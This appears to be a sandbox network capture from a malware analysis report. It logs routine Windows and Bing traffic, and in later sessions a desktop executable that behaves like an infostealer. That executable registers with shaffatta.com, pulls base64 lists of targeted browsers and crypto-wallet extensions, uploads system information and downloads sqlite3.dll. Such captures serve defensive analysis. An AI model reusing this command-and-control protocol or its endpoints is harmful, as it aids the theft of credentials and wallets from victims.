2024-05-03 00:07:13 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-03 00:07:13 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=25030 Date: Fri, 03 May 2024 00:07:13 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	23.199.50.2	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:13 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-03 00:07:13 UTC	659	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-CID: 7 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 974286BFDC254CDCB50C2B73CC4B4276 Ref B: MNZ221060605025 Ref C: 2023-03-13T15:26:50Z X-MSEdge-Ref: Ref A: 87B54C6474A14C81B6E546C3B6B2F842 Ref B: BLUEDGE1720 Ref C: 2023-03-13T15:26:50Z Cache-Control: public, max-age=24914 Date: Fri, 03 May 2024 00:07:13 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-03 00:07:13 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49721	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H8C+XZOAWfMGxBS&MD=hxA+7znt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-03 00:07:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: bfb6fc9b-bebc-4f50-bb97-c5859ddaf8ec MS-RequestId: 67a0c5a5-eed2-4b2f-ae69-7583cecc4b95 MS-CV: F68OMcW4sUmK4aU9.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 03 May 2024 00:07:19 GMT Connection: close Content-Length: 24490
2024-05-03 00:07:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-03 00:07:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49724	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:19 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714694808007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-05-03 00:07:19 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-05-03 00:07:19 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-05-03 00:07:20 UTC	479	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 124F999BA5A9492F8CE824FF97EB8BE4 Ref B: LAX311000109023 Ref C: 2024-05-03T00:07:19Z Date: Fri, 03 May 2024 00:07:20 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1714694839.d7e2e74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49727	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:58 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H8C+XZOAWfMGxBS&MD=hxA+7znt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-03 00:07:58 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 40e45031-726c-443d-a628-2b582ea7fff7 MS-RequestId: 9eb9db5e-2171-4598-8f30-6ef5a59ccf11 MS-CV: kpH9QQO7skaM7Aq6.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 03 May 2024 00:07:57 GMT Connection: close Content-Length: 25457
2024-05-03 00:07:58 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-03 00:07:58 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49732	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:23 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF Host: shaffatta.com Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:23 UTC	216	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 30 46 46 46 31 46 33 45 30 34 33 34 37 39 32 32 31 31 33 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 49 6e 73 74 61 6c 6c 5f 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 2d 2d 0d 0a Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="hwid"930FFF1F3E043479221132------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build"Install_2------FHCAEGCBFHJDGCBFHDAF--
2024-05-03 00:08:23 UTC	206	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 156 Connection: close Vary: Accept-Encoding X-Served-By: shaffatta.com
2024-05-03 00:08:23 UTC	156	IN	Data Raw: 59 6a 4a 6c 59 6a 45 79 4d 6a 46 68 59 7a 52 6b 4e 47 55 31 4d 7a 63 78 59 54 4a 68 4d 57 55 31 59 7a 46 69 4e 6a 49 77 4d 6a 46 69 4d 6a 4e 6b 5a 6a 55 33 59 57 49 77 4d 6a 68 6c 59 7a 49 30 5a 44 49 35 59 6a 51 31 59 57 55 77 59 6a 41 77 4e 6a 6b 7a 59 7a 4e 68 5a 44 6c 68 4e 6a 55 32 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: YjJlYjEyMjFhYzRkNGU1MzcxYTJhMWU1YzFiNjIwMjFiMjNkZjU3YWIwMjhlYzI0ZDI5YjQ1YWUwYjAwNjkzYzNhZDlhNjU2fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49733	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:24 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: shaffatta.com Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:24 UTC	268	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 47 43 47 43 47 49 45 Data Ascii: ------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------KECBGCGCGIEGCBFHIIEBContent-Disposition: form-data; name="message"browsers------KECBGCGCGIE
2024-05-03 00:08:24 UTC	207	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: close Vary: Accept-Encoding X-Served-By: shaffatta.com
2024-05-03 00:08:24 UTC	1520	IN	Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIER

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49734	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:25 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE Host: shaffatta.com Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:25 UTC	267	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"plugins------JJDGCGHCGHCB
2024-05-03 00:08:25 UTC	207	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: close Vary: Accept-Encoding X-Served-By: shaffatta.com
2024-05-03 00:08:25 UTC	5416	IN	Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49735	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:26 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: shaffatta.com Content-Length: 5823 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:26 UTC	5823	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 6c 7a 64 47 56 74 58 32 6c 75 5a 6d 38 75 64 48 68 30 0d 0a 2d 2d 2d Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZm8udHh0---
2024-05-03 00:08:26 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49736	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:27 UTC	92	OUT	GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:27 UTC	288	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:27 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: close Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT ETag: "10e436-5e7ed3ec64580" Accept-Ranges: bytes X-Served-By: shaffatta.com
